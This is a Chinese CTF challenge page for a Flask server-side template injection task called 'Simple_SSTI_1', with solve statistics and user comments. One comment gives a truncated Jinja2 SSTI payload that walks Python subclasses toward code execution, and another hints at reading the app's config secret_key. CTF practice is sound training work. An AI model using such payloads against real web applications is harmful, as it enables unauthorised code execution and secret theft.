Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 29025
提  示:
描  述:
Simple_SSTI_1
评论
renbangli 5年前

解题全靠搜我是废物 https://blog.csdn.net/weixin_43202635/article/details/115612244

回复 12

15103261566 5年前

金币不够用了啊

回复 0
sunny 5年前

可以通过答题、签到、投稿、充值获得金币。

回复 3

ccabner 5年前

源代码中提示很明确

回复 3

1528730734 5年前

太难了

回复 3

流鼻涕的火柴人 5年前

为什么场景进不去???

回复 0
huangdoudou 5年前

我也进不去

回复 0

Bugku666 5年前

我承认我自卑....

回复 3

soseny 5年前

不是很懂啊

回复 0

Sextbeast 5年前

这个漏洞是Flask(Jinja2)服务模板注入漏洞,可以构造payload: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__c

回复 9

charliemm 5年前

自己太笨了,都不知道怎么做,直到看到别人评论!

回复 4

kukksaku 5年前

python框架类web题,需要了解flask的基本文件配置和变量使用。题目远吗提示了可以通过参数secret_key获取,在配置文件中的参数都是大写的,且可以通过config.参数来获取该参数。config.item()可以获取配置文件里的所有参数。

回复 14

WriteUp

image
valecalida

5 金币

评分(51)

解题动态

厌弃. 攻破了该题 23小时前
香克斯呀 攻破了该题 2天前
LLawliet 攻破了该题 2天前
chenlinXdb 攻破了该题 4天前
CTF-大王 攻破了该题 5天前
青春6666 攻破了该题 7天前
wengun 攻破了该题 7天前
cxkkammt 攻破了该题 7天前
这个昵称已存在 攻破了该题 8天前
EvinZe 攻破了该题 8天前
我只有两题不会 攻破了该题 8天前
星宇Sec 攻破了该题 8天前
mystery 攻破了该题 11天前
__tian__ 攻破了该题 12天前
gysbfff 攻破了该题 12天前
ItsAllOver 攻破了该题 12天前
hzydy0_0 攻破了该题 16天前
Fredjoker 攻破了该题 16天前
CyberX 攻破了该题 17天前
xwm 攻破了该题 18天前
问题反馈